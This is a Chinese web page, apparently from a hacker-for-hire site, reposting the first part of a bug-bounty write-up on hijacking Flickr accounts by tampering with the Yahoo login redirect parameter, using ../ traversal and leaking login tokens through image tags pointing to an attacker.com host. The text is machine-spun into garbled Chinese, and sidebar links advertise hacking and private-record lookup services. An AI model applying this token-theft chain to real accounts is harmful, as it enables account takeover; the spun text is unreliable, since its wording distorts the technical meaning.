当前位置:首页 > 黑客技术 > 正文内容

看我怎么综合利用3个安全问题成功绑架Flickr账户取得7千美元缝隙赏金

访客4年前 (2021-04-09)黑客技术952


Flickr( flickr.com)为yahooYahoo旗下图片和视频共享渠道,供给免费及付费数位相片视频贮存、共享和线上交际应用服务。本文中作者通过身份认证参数控制、外部链接重定向和图片处理绕过3个安全问题的综合利用,终究成功完结绑架Flickr的方针账户权限。咱们一起来看看:
在Flickr的用户登录验证过程中,将会向login.yahoo.com建议一个获取用户拜访令牌(access token)的恳求。
Flickr.com的登录认证机制
当用户点击Flickr.com的登录按钮之后,将会转向到以下Url链接:
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DH6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=il&.lang=en&mg=1&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dil%26.done%3Dhttps%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253Dhttps%25253A%25252F%25252Fwww.flickr.com%25252F
该链接也是yahoo用户的登录认证页面,当完结登录表单填写和点击登录之后,用户将首要转向一个yahoo身份验证终端服务,假如验证信息有用,用户将转向以下Flickr Url页面:
https://www.flickr.com/signin/yahoo/?redir=https%3A%2F%2Fwww.flickr.com%2F&.data={first-token-value}&.ys={second-token-value}
与此同时,Flickr在后台开端对yahoo验证服务和用户登录发作的.ys和.data参数进行认证。
盗取Flickr.com用户登录令牌信息
思路剖析
也就是说,假如用户现已处于yahoo服务端登录状况,那么点击以下初始链接之后:
https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DH6T9XcS72e4mRnW3NpTAiU8ZkA--&.intl=il&.lang=en&mg=1&.done=https%3A%2F%2Flogin.yahoo.com%2Fconfig%2Fvalidate%3F.src%3Dflickrsignin%26.pc%3D8190%26.scrumb%3D0%26.pd%3Dc%253DJvVF95K62e6PzdPu7MBv2V8-%26.intl%3Dil%26.done%3Dhttps%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253Dhttps%25253A%25252F%25252Fwww.flickr.com%25252F
数据流量仅仅发作在后台,而不需要往yahoo端输入身份验证信息,而这也就带来了账户被绑架的危险。由于事实上用户只需点击相似OAuth完结的单个链接完结身份认证。想通了这些之后,我测验考虑方法绕过该认证机制。
首要,我想到的是该链接中的第二个.done参数:
.done%3Dhttps%253A%252F%252Fwww.flickr.com%252Fsignin%252Fyahoo%252F%253Fredir%253Dhttps%25253A%25252F%25252Fwww.flickr.com%25252F
能够被控制,该参数实践担任的是登录令牌信息的发送。在此过程中,yahoo服务器只会对https://www.flickr.com/signin/yahoo/建议的登录恳求进行验证,但咱们能够向该链接中增加../符号进行测验,当向其间增加../../test恳求.done值时,其.ys和.data参数令牌将被发送到https://www.flickr.com/test服务端。
所以,在此一种主意就情不自禁,假如咱们能从https://www.flickr.com/网站找到一个敞开重定向(Open redirect)的突破口, 就能把认证令牌信息直接发送到咱们自己架构的服务器端来。
缝隙发掘
通过一番研讨之后,我发现了该页面:
https://www.flickr.com/html.gne?tighten=0&type=comment
它能够在不同Flickr页面的谈论区中完结图片嵌入。我想假如通过这儿向谈论区中上传一个外部链接图片,其令牌信息就能够通过现已登录的引证字段(referrer field)走漏到我自己架构的服务器端来。为此,我用以下内容作为上传图片进行谈论测验:
img src=”https://attacker.com/someimage.jpg” />
该图片确实被嵌入到Flickr谈论区,可是,yahoo却把其src值转义解析为以下链接:
https://ec.yimg.com/ec?url=https://attacker.com/someimage.jpg&t=1491136241&sig=FGQiNHDOtEj7LQDBbYBnwA–~C
这种转义应该是yahoo的一种内部恳求署理在发作效果,它能够阻挠向外部服务器走漏Flickr的恳求信息。可是,假如运用一些浏览器进犯的奇技淫巧,是不是就能控制其Flickr的图片处理逻辑呢?比方,发送形如以下的图片谈论内容:
img src=”//www.attacker.com/someimage.jpg” />
但惋惜的是,其内部恳求署理不会转义处理该链接,其src值仍是坚持原样,而且Flickr谈论区也不会把其显现为图片。通过研讨,发现这是由于Flickr运用了网页内容安全防护战略(CSP,Content Security Policy),限制了来自以下域名的链接才是有用链接:
Content-Security-Policy:  img-src data: blob: https://*.flickr.com https://*.flickr.net http://*.flickr.net https://*.staticflickr.com http://*.staticflickr.com https://*.yimg.com https://*.yahoo.com https://*.cedexis.com https://*.cedexis-test.com https://*.cedexis-radar.net https://sb.scorecardresearch.com https://image.maps.api.here.com https://csync.yahooapis.com https://*.paypal.com https://*.pinterest.com http://*.static-alpha.flickr.com https://geo-um.btrll.com https://connect.facebook.net https://*.facebook.com https://bs.serving-sys.com https://*.adserver.yahoo.com https://*.maps.api.here.com https://*.maps.cit.api.here.com https://*.ads.yahoo.com https://secure.footprint.net;
其img-src装备中的设定了白名单域名,因而,终究上传显现外部链接图片的意图失利了。
在了解了这些之后,我测验着寻觅其它答应谈论的终端页面,发现Flickr其间一个论坛页面:
https://www.flickr.com/help/forum/en-us/
不光答应谈论,形似还没有装备CSP战略。因而,我在该论坛的某个论题之下加入了以下图片款式的谈论内容:

[1] [2]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106203.html

分享给朋友:

“看我怎么综合利用3个安全问题成功绑架Flickr账户取得7千美元缝隙赏金” 的相关文章

天猫双十一活动什么时候开始华流

以前提到双十一那都是光棍才过的节日,而现在双十一摇身一变成了全民购物狂欢节。在双十一期间以淘宝天猫为主的购物平台都会推出各种优惠活动以及满减折扣,可以算得上是全年最便宜的时候了。那么天猫双十一活动什么时候开始呢?下面就跟百思特小编来详细了解一下2020年天猫双十一开始时间吧!...

接单的黑客_可以找黑客黑美团吗

有在网络安全范畴中,猜测网络违法和歹意软件发展趋势好像现已成为了各大网络安全公司的传统了。 为了防止让咱们去阅览上百页的安全陈述,咱们专门整兼并总结了McAfee、Forrester、FiskIQ、卡巴斯基实验室【1、2、3】、WatchGuard、Nuvias、FireEye、CyberArk、F...

Webshell安全检测篇

0x00 依据流量的检测办法 1.概述 笔者一直在重视webshell的安全剖析,最近就这段时刻的心得体会和咱们做个共享。 webshell一般有三种检测办法: 依据流量方法 依据agent方法(本质是直接剖析webshell文件) 依据日志剖析方法 Webshell的分...

最新金属硅价格_硅的价格是多少钱一吨

说实话,3303#如果12200-12400.近日国内金属硅价格继续上扬,在1880-1990美元/吨FOB,553#不通氧11500元/吨左右,以上参考一下。很多种类型的,像生产太. 我知道东3省基本都有。您需要?10000元-300目沪产170-190,如果是低钙、以前大约4年前含量高的是300...

如何查询酒店开房记录?谁可以查?网上怎么查?

关于酒店开房记录,这个基本上是看不到的,只有公检法系统(主要是公安局)才能查询的。如果你真想查询,要提供相关真实的身份证明,到公安局咨询,可能需要繁琐的手续。 2014年初,网上就有过“2000W开房数据泄露”的惊爆新闻,是因众多酒店使用了浙江慧达驿站公司开发的酒店Wi-Fi管理、认证系统,而该公司...

如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗)

一、如何寻找黑客微信号(只有一个微信号,黑客可以查到对方吗) 1、有黑客能查到微信聊天记录是骗人的吗绝对是骗子,请勿相信! 微信聊天信息保存在本地 一般聊天信息都是保存在本地的,除非开通会员可以将聊天信息存储。 黑客查找出来的微信聊天截图是真的吗在手机端启动微信,在微信主界面底部导航中点击“微信”...

评论列表

笙沉謓念
2年前 (2022-07-07)

c值转义解析为以下链接:https://ec.yimg.com/ec?url=https://attacker.com/someimage.jpg&t=1491136241&sig=FGQiNHDOtEj7LQDBbYBnwA–~C这种转义应该是yahoo的

北槐独语
2年前 (2022-07-07)

src=”https://attacker.com/someimage.jpg” />该图片确实被嵌入到Flickr谈论区,可是,yahoo却把其src值转义解析为以下链接:https://ec.yimg.com/ec?url=https://attacker.com/someimage.j

瑰颈勒言
2年前 (2022-07-08)

。因而,我在该论坛的某个论题之下加入了以下图片款式的谈论内容:[1] [2]  黑客接单网

冬马孚鲸
2年前 (2022-07-08)

初始链接之后:https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c%3DH6T

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。